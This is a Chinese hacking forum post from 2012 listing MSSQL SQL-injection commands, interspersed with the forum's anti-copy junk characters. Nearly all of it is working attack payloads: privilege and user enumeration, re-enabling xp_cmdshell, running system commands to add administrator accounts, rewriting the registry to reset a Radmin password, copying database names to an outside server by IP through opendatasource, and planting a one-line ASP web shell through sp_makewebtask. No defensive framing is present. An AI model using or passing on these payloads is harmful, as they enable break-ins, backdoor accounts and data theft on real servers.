找回密码
 立即注册
查看: 2397|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令+ A7 B: X. M6 r3 ?3 B
//看看是什么权限的
% y" @8 R; ]/ P! u  b) ?and 1=(Select IS_MEMBER('db_owner'))
( {3 b, l5 w6 j4 a+ JAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--# R& b* c3 \5 b% I& O8 v! U" K# b
+ D) V4 O2 s/ ~9 n8 T+ l: m( K
//检测是否有读取某数据库的权限
/ s3 ^0 ^6 [8 N- c% a* oand 1= (Select HAS_DBACCESS('master'))9 w3 q+ S& G3 L( G/ l8 O6 T
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --& s- {# S( T. n) ]" J( c
0 S( @  M: a9 m1 X% T  q# o

1 m5 m  {3 }) L% ]" f0 r数字类型0 e: {* \9 r$ R/ l
and char(124)%2Buser%2Bchar(124)=0
$ i0 p8 X1 B4 b" f9 h4 _: }1 g: V9 s+ X. i* S$ m2 ?
字符类型
$ n1 S& h2 h$ G! A8 J* l$ [' and char(124)%2Buser%2Bchar(124)=0 and ''='! S# u* g1 w) m$ o. U3 S

7 g1 m+ @% k# M' D搜索类型
  {  _/ n' R# n8 o' and char(124)%2Buser%2Bchar(124)=0 and '%'='
% x- H8 e/ U" k
# i: ]+ p/ ]/ U$ G爆用户名
. C4 @8 ]/ f! a( S* Jand user>0
9 ?4 X; m$ ~) ~; D' s' and user>0 and ''='
  p9 {: o3 [! R
. S# R# B; j: K% J/ z- x3 C检测是否为SA权限1 e( _) ~  n: P
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--9 F# \+ [9 p. w) g& S2 `
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --/ ?* {+ b  q3 S0 b' k0 D/ @
2 Q4 M4 V& Q% B0 h5 U9 P9 Z
检测是不是MSSQL数据库$ d: p+ |3 G4 K- g( C) P2 o
and exists (select * from sysobjects);-- " Q7 @+ T& @4 N, e7 M" Y

- v2 O1 l+ z- z  W) O$ m, C检测是否支持多行
1 w& o! a$ o, Q, }, ~6 ];declare @d int;-- 6 {1 H# C1 x( S& a
6 m3 H" u: s& {4 l+ g
恢复 xp_cmdshell. g! h7 W8 ?3 R5 H& [$ u
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 w8 c- i' t/ i: |. {9 {  Y9 @# m. z
2 ]* A9 k: `( x9 }/ L
! W+ ^1 N% W7 `9 ]select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 Q& B1 o% L- Y, s; F4 d1 }9 E- t7 ~& u: ?3 Q
//-----------------------
6 |" j* l# w. Z+ E3 k: f, p' ~//      执行命令
" P4 B* O# j" m9 @( O5 a//-----------------------
1 N; s) W4 F: [; s首先开启沙盘模式:+ G0 d4 |. c3 p: r/ u) a* m
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 S+ v$ `: T) {+ B& K% X+ R- k
8 H2 i$ Q; C7 x, X7 a7 A# u然后利用jet.oledb执行系统命令8 g0 l2 q$ X( @: G* F3 F+ f. h
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')9 T4 L$ K  j1 I" k9 K
  N. E9 b' Q$ t  j/ j5 a. u
执行命令
: s2 Q# h) M: W;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--5 ?0 C. `( v# G" X& D# E! d% {2 x
6 z% h# T8 l3 a5 U- }
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
4 U! `. I" ~( J* L  s/ q  N! s7 \+ O" U$ ?4 M0 k. t9 _2 I" t* q
判断xp_cmdshell扩展存储过程是否存在:. i0 U( p/ b$ Q4 I0 F. F3 n
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
! r) i" H- N2 Y9 G5 g% f
6 B$ q4 B2 f$ d写注册表( \% n/ z$ i& x' w
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1  [; Q. \" C2 V8 T8 B! T: O+ O( x
, A/ V: O+ x- t
REG_SZ
; g' S; g) c4 n- X
+ Y  ~0 u5 H. z$ H读注册表, e& c% Z/ b1 M/ Y/ l5 Y/ ^( K1 X
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
' d6 f/ f, j% ]+ S) V, l
0 P8 S7 W+ D& l) G读取目录内容0 u4 F4 d( O+ |- x( N7 k$ c
exec master..xp_dirtree 'c:\winnt\system32\',1,1
# `! g( w, |6 ?: G0 c7 d' [5 o* r+ m+ r6 D: i1 y+ ]; a8 Z4 X
5 _; K( t, c5 A9 s
数据库备份
1 Q8 l- L; X) A# U" zbackup database pubs to disk = 'c:\123.bak', x* d' j7 K" n! ]
8 \- y  @; h: C( g6 J  i: N
//爆出长度! b% j0 S3 z' O& v& V  L7 x
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
% M9 T  ~$ {) t/ J) O- c2 N( r$ ?. h/ v1 B$ B# x

2 m( k- Y9 n% C% ?( n# `2 G0 i& v
' U! ~4 @  ?! k* C* K0 b7 P  [' A更改sa口令方法:用sql综合利用工具连接后,执行命令:+ `4 `2 m  C( Q% g
exec sp_password NULL,'新密码','sa'
* @+ F% u1 C1 z5 L
5 Q5 w. O7 Y" O- Y2 z& `添加和删除一个SA权限的用户test:
4 |& C) W5 r6 w7 t$ i( j/ Rexec master.dbo.sp_addlogin test,ptlove: ^$ j3 s5 q) ]- d7 p
exec master.dbo.sp_addsrvrolemember test,sysadmin$ n/ E0 y/ `( X( N) f' q

1 C2 }# D* I* O, x# X6 K$ d. d删除扩展存储过过程xp_cmdshell的语句:
' g$ l0 f0 R( d, N9 K5 f0 yexec sp_dropextendedproc 'xp_cmdshell'3 m" i6 u) s* G4 d
  X" X9 w0 p- b5 U$ V& h* R# B  y
添加扩展存储过过程% j% ]2 N- E& ~5 S6 p7 P* o9 h7 ?
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 5 _/ q6 X) e- s( c* E/ a& m$ h
GRANT exec On xp_proxiedadata TO public 1 i; J3 I2 b0 b8 {
5 P) a- Q/ V3 B1 y
6 {+ [  b; q1 g" _& L6 W0 o/ [% A' ^
停掉或激活某个服务。 " X* ]) }6 h2 {1 I1 h1 W
! {) d8 g; z! p5 y9 N
exec master..xp_servicecontrol 'stop','schedule'
! i2 f8 x) G9 g6 U. Yexec master..xp_servicecontrol 'start','schedule'
- q3 i, P; J2 R- \6 ^, w0 B( o4 N7 p" c  N0 x$ A
dbo.xp_subdirs
8 \% E' [9 Y& I" T
! ]7 C9 {& K6 P: k2 c% ?+ ]只列某个目录下的子目录。. R- ?0 t  j' V# M8 e
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
* F1 o, M0 a0 |( I8 y) Z" f
  }9 a9 R: V6 m7 tdbo.xp_makecab$ C! d3 v7 Q, V3 y$ D0 h9 Q+ f
, l- u( `; H2 i" }# o
将目标多个档案压缩到某个目标档案之内。
: b8 z9 S9 U9 L/ M) a8 Z/ ^所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。4 x0 c: Q% J4 N* \! \( E: Z+ x
% G9 N5 {& Z* a2 k4 k5 t: ]
dbo.xp_makecab
& F! B$ \. x8 i" E'c:\test.cab','mszip',1,; @8 a" Y$ X2 i( Y* S1 U$ Q. ^2 C7 O
'C:\Inetpub\wwwroot\SQLInject\login.asp',
3 C% A: A% p1 n% q* J- X'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'1 b" T5 t( z! o3 G+ a! ~
9 N8 a  _. S3 ~& N0 t- Q
xp_terminate_process6 p, w, B7 x7 c$ Y  ^

7 n$ z. F: h; |0 g7 X: o5 F停掉某个执行中的程序,但赋予的参数是 Process ID。
2 N% _. n/ A9 O. l  o利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
+ I7 x9 s2 i6 ?1 e, Z, b/ _
+ n+ @- i6 q: P- u8 V! O7 Bxp_terminate_process 2484" D  Q: |$ Q) F% S( l5 H1 l
7 r# S; w' Z! X7 Y) O
xp_unpackcab
# [9 D7 F+ |7 d5 Q! D+ W4 M. T9 {9 p# e8 v) ~) ?, Q2 |1 @4 l
解开压缩档。
! D  D: q' S0 T& ^5 Z; \+ \. h8 B' k( L$ @+ N
xp_unpackcab 'c:\test.cab','c:\temp',13 h. }6 I% S  s. y% J
7 R' u, u4 U  ^9 `* S) T8 Z& `+ v
. d5 l& X0 N) U
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234, @1 {5 H/ f& Z0 h" X( O

9 h2 ?6 F4 M7 ^0 w6 Z: q9 y; i# s5 ncreate database lcx;! a% L# r2 D* a6 a. A! `
Create TABLE ku(name nvarchar(256) null);
0 M  {& k1 L: e6 c* N; mCreate TABLE biao(id int NULL,name nvarchar(256) null);, D  Z! _6 L* \2 }! O$ |1 a

2 z  {! X& O9 V& y  }; I* I//得到数据库名, E6 U0 }3 ^  a% H1 a
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases  Z' t5 o% F. X( y
9 M* \! j& A3 F

! L( y8 C' |2 f& g5 Y//在Master中创建表,看看权限怎样0 |( t( M  E! u2 A$ J
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--' C  E, b9 ~" w

- K! N8 W2 ~' \用 sp_makewebtask直接在web目录里写入一句话马:
  k$ r8 `+ x' n1 |5 W' |http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
. j' ]8 L, j% ^% v& A% l& k4 K7 g/ f+ _3 g+ k
//更新表内容
1 L/ Y7 {( W# R4 E4 qUpdate films SET kind = 'Dramatic' Where id = 123
) v0 f' l9 \1 M, h
* P" g3 U2 w/ `' U' }4 i* t9 R//删除内容
& W. M, f& Y" f- Tdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表